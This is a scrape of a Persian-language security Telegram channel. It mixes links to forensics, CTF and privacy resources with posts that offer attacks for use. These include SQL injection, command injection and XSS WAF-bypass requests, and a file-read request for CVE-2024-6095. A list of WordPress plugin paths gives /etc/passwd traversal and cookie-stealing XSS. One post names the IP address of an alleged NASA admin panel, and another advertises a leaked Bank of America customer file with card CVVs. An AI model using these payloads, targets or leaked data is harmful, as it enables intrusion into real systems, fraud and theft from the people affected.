P.F.K Security
@PfkSecurity
1.61K subscribers
128 photos
38 videos
37 files
404 links
APT / Exploit / Malware / ICS / OT / Vulnerability Analysis / SE
Download Telegram
About
Blog
Apps
Platform
Join
P.F.K Security
1.61K subscribers
P.F.K Security
فریم ورک استخراج حافظه volatile

https://github.com/volatilityfoundation/volatility3

شناسایی سرویس های مخفی ویندوز:
https://volatility-labs.blogspot.com/2023/03/memory-forensics-rd-illustrated-detecting-hidden-windows-services.html

#windows
@pfksecurity
GitHub
GitHub - volatilityfoundation/volatility3: Volatility 3.0 development
Volatility 3.0 development. Contribute to volatilityfoundation/volatility3 development by creating an account on GitHub.
2.02K views
P.F.K Security
Forwarded from Red Blue Team
🧩 اگر دنبال یک مکان برای منابع CTF هستید میتوانید از کانال ما استفاده کنید .

پست ها به دو زبان Persian & English می باشد .

🧩 If you are looking for a place for CTF resources, you can use our channel.

The posts are in Persian and English.

@PfkCTF
2.13K views
P.F.K Security
اگر زمانی که پیروزی شما قطعی است و پرهزینه نخواهد بود، نمی جنگید. ممکن است به لحظه‌ای برسید که مجبور شوید با تمام شانس‌تان و تنها شانسی که در آن بقایی مخاطره‌آمیز در انتظارتان است ، مبارزه کنید. حتی ممکن است سرنوشت بدتری وجود داشته باشد، ممکن است مجبور شوید زمانی که امیدی به پیروزی وجود ندارد بجنگید، زیرا بهتر است از بین بروید تا مانند برده زندگی کنید.

#وینستون_چرچیل

@pfksecurity
2.47K views
P.F.K Security
کتابخانه ای برای انجام آنالیز Dalvik در C++

https://github.com/Fare9/Shuriken-Analyzer/

@pfksecurity
GitHub
GitHub - Shuriken-Group/Shuriken-Analyzer: Repository for a library focused on binary analysis (mainly for Java related bytecodes)
Repository for a library focused on binary analysis (mainly for Java related bytecodes) - Shuriken-Group/Shuriken-Analyzer
671 views
P.F.K Security
💡Hashmob
- بزرگترین انجمن بازیابی رمز عبور


HashMob
یک انجمن آنلاین بزرگ است که بر بازیابی رمز عبور و رمزنگاری متمرکز شده است. این به عنوان بستری برای همکاری کاربران در بهبود تحقیقات رمز عبور و کشف روندها عمل می کند. این انجمن منابعی مانند آمار، فهرست کلمات، قوانین، راهنماها و آموزش هایی را ارائه می دهد که برای محققان و آزمایش کنندگان نفوذ مفید است. علاوه بر این، HashMob از انواع الگوریتم‌های هش، از جمله الگوریتم‌های هش‌کت غیر باینری، پشتیبانی می‌کند و ابزارهایی برای بازیابی رمزهای عبور از فرمت‌هایی مانند MD5، SHA1، و ZIP و همچنین کیف پول‌های دیجیتالی مانند بیت‌کوین و اتریوم ارائه می‌کند.

HashMob[.]net
میزبان طیف وسیعی از منابع رسمی و فهرست هاست که برای تسهیل فعالیت های بازیابی رمز عبور استفاده می شود. این پلتفرم همچنین کاربران را تشویق می کند تا برای تعامل و پشتیبانی بیشتر به انجمن Discord خود بپیوندند .

لینک:
https://hashmob.net/
@PfkSecurity
745 views
P.F.K Security
Media is too big
VIEW IN TELEGRAM
DC32 - Red Team Village x Amazon
@PfkSecurity
676 views
P.F.K Security
گزارش باج‌افزار ThreatLabz 2024 Zscaler نشان می‌دهد که باج‌افزار DarkAnges بزرگترین پرداخت باج‌افزار تاریخ را دریافت کرده است: 75،000،000 دلار

برای درک این موضوع: کسی می تواند با این پول 524 مرسدس بنز G واگن 2024 بخرد.
599 views
P.F.K Security
https://class.malware.re
@PfkSecurity
539 views
P.F.K Security
ابزارهای حفظ حریم خصوصی

• در شرایط مدرن، حفظ ناشناس بودن و حفظ حریم خصوصی در حال تبدیل شدن به یک امتیاز نادر برای معدود منتخب - شهروندان ثروتمند یا آموزش دیده فنی است که می توانند سرور و VPN خود را راه اندازی کنند، می دانند چگونه #Linux را راه اندازی کنند، فایل ها را رمزگذاری کنند، از مدیران رمز عبور استفاده کنند، مرورگر Tor و غیره.

• اما حق ارتباطات امن و خصوصی نه تنها برای نخبگان فناوری، بلکه برای مردم عادی نیز باید رعایت شود.

• حریم خصوصی یک حق مطلق انسانی است. اگر هر کشوری بخواهد این حق را برای شهروندانش محدود کند، در آن صورت شهروندان می توانند نتایج مناسبی بگیرند.

• از لینک های زیر برای یافتن ابزارهای مفید برای کمک به حفظ حریم خصوصی و رازداری خود استفاده کنید:

https://github.com/cqcore/Privacy-Infosec-Tools-Resources

• راهنمای منحصر به فرد را فراموش نکنید که شامل 160 صفحه اطلاعات در مورد محافظت از هویت شما به صورت آنلاین در منابع و برنامه های مختلف است.
@PfkSecurity
GitHub
GitHub - The-Osint-Toolbox/Privacy-Infosec-Tools-Resources: A good selection of Privacy & Infosec tools that will help you understand…
A good selection of Privacy & Infosec tools that will help you understand more about how to protect your online privacy and security. - The-Osint-Toolbox/Privacy-Infosec-Tools-Resources
791 views
P.F.K Security
fpga.pdf
6 MB
#reverse

F(PGA) Tour : Evading reverse engineering

@PfkSecurity
677 views
P.F.K Security
Onion Scanner
https://pvhwsb7a3d2oq73xtr3pzvmrruvswyqgkyahcb7dmbbfftr4qtsmvjid.onion/

@PfkSecurity
608 views
P.F.K Security
پایگاه داده اکسپلویت 🧑‍💻

https://www.exploit-db.com

https://www.milw00rm.com

https://0day.today

https://packetstormsecurity.com

https://www.windowsexploits.com

https://iedb.ir

https://www.macexploit.com

@PfkSecurity
Exploit-Db
OffSec’s Exploit Database Archive
The Exploit Database - Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability Reports, Security Articles, Tutorials and more.
837 views
P.F.K Security
https://x86re.com

@PfkSecurity
753 views
P.F.K Security
SpringBlade SQL

GET /api/blade-desk/notice/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1

#exploit #poc #SQL
@pfksecurity
799 views
P.F.K Security
CVE-2024-7436

GET /msp_info.htm?flag=cmd&cmd=payload /1.1
Host: {{Host}}
Cookie: {{Cookie}}

payload

#exploit #poc #IoT
@pfksecurity
838 views
P.F.K Security
https://198.119.191.29/cgi-bin/site/admin/larcadmin

پنل مدیریت ناسا
@pfksecurity
1.35K views
P.F.K Security
این را در مورد CSAM می‌گوید، اما تمام پیازها را در موتور جستجوی خود که هنوز CSAM دارند، حتی اگر قابل جستجو نباشد، فاش می‌کند. لطفا از Ahmia استفاده نکنید.

https://ahmia.fi/onions/
@pfksecurity
735 views
P.F.K Security
BNKoFAmerica.txt
120.4 MB
پایگاه داده 4.8 میلیون کاربر متعلق به Bank Of America

- شناسه کاربری، نام کامل، موجودی، تاریخ انقضا، نوع حساب، CVV
@PfkSecurity
692 views
P.F.K Security
Xss Bypass Waf

<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//

@PfkSecurity
780 views
P.F.K Security
CVE-2024-6095

POST /models/apply HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json

{"url":"file:///etc/passwd"}

#exploit #poc

@PfkSecurity
461 viewsedited  
P.F.K Security
افزونه های وردپرس
____
simple-image-manipulator
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd

activehelper-livehelp
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

amministrazione-aperta
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd

anti-plagiarism
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

buddypress-component-stats
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd

dzs-videogallery
/wp-content/plugins/dzs-videogallery/admin/upload.php

e-search
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

fancy-product-designer
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php

hd-webplayer
/wp-content/plugins/hd-webplayer/playlist.php

localize-my-post
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd


@PfkSecurity
548 views